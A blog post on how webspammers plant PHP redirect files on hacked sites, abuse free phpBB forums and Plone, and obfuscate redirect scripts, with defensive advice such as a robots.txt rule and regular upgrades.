Spammy redirects

While tracking webspammers, I’ve seen more and more use of redirects from whatever webservice the spammers can utilize. That includes Blogspot, free phpBB forum sites, Plone, and even hacked websites.

Basically, whatever they can use, they will.

We’re getting used to free services being used for redirects, but when they start turning our own websites against us, it’s time to wake up.

Hacked websites

Vizaweb webhosting warned their customers recently that hackers had been sniffing FTP passwords. Customers were directed to only use secure ways to log in, and to change their passwords. Lots of them didn’t, and got their websites broken into. The normal operation of the websites didn’t change, so the website owners had no idea anything was wrong. In the meantime, the hackers had placed php files in existing directories off the root that served up spammy redirect pages using includes (pulling the content in from the spammer’s site). The php files were about 1 Kb small, so easy to overlook. They’d be named read.php, wp-read.php, rss.php or something else innocuous. Some scripts even included code to suppress any errors generated. The files would be called with keywords added (?q=keyword) that created the spammy redirect files. The spammers led search engines to these files by comment spamming guestbooks and blogs. Suddenly the spammers had redirect files on (maybe) high PR sites or even authority sites. Sites that were previously above reproach.

We found the spammers through the cutouts they redirected through (on the way to PPC programs), and through reading the raw php files supplied by the website owners. One even told us his root index.php file had been replaced. As far as we could tell from casual inspection, the doctored index.php file was calling up a Webattacker installation. The site thus compromised was a busy community site…

Free phpBB forums

There’s a jungle of free phpBB forum services out there, and the spammers have figured out a way to make redirects. They insert code in the forum descriptions. That way the redirect works from the front page of the forum. Luckily, there’s an easy solution that all free phpBB forum providers can implement (and many have), discovered by Pickaforum’s admin:

phpBB redirect fix
(note, this was squished together to make the graphic. The code is on one line)

The developers of Plone have released new versions and encourage users to upgrade. I’d like to add that if I had a Plone installation, I’d prepare a robots.txt file that directed search engine spiders to not go near the Member directory. That way, if the spammers managed to upload spammy pages – redirects or not, they wouldn’t embarass me in the search engines.

Like this:

User-agent: *
Disallow: /Members/

Never ending arms race

The spammers are continually looking for susceptible software and web services they can use to redirect. They try to stay two steps ahead of us.

The spammers keep changing their redirect javascripts. The goal is to hide them from website and web service owners, so the pages don’t get deleted. Or to create code that will work, even when straight code would be blocked. To do that, they obfuscate the code. There are myriad ways of doing that, from simply chopping up the words to using charcode or changing the charcode so it doesn’t look like charcode. Whatever can be put together again by a browser, they will use.
We recently had a long discussion with a bunch of spammers. They see us “antis” as deplorable human beings who persecute them for no reason. They seeem to think what they’re doing is laudable. Basically, they’ll continue looking for ways to turn our websites against us, in the race to earn money for their “starving children”. The spamming is not going to stop.
So check your site statistics for anything unusual, check your raw logs, and upgrade your php apps regularly.